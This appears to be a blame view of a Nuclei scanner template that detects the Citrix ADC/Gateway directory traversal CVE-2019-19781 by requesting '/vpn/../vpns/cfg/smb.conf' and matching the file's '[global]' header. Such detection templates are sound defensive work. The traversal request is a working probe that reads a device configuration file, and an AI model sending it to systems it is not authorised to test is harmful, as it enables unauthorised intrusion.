nuclei-templates/http/cves/2019/CVE-2019-19781.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19781
2020-04-05 22:27:04 +00:00
info:
name: Citrix ADC and Gateway - Directory Traversal
2022-02-16 19:14:13 +00:00
author: organiccrap,geeknik
severity: critical
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
reference:
- https://support.citrix.com/article/CTX267027
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
- https://www.kb.cert.org/vuls/id/619785
- http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-19781
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.9748
cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: citrix
product: application_delivery_controller_firmware
tags: lfi,kev,packetstorm,cve,cve2019,citrix
2020-04-05 22:27:04 +00:00
http:
2020-04-05 22:27:04 +00:00
- method: GET
2020-05-25 07:49:06 +00:00
path:
2020-04-05 22:27:04 +00:00
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
2022-02-16 19:24:50 +00:00
matchers-condition: and
2020-04-05 22:27:04 +00:00
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
- "[global]"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200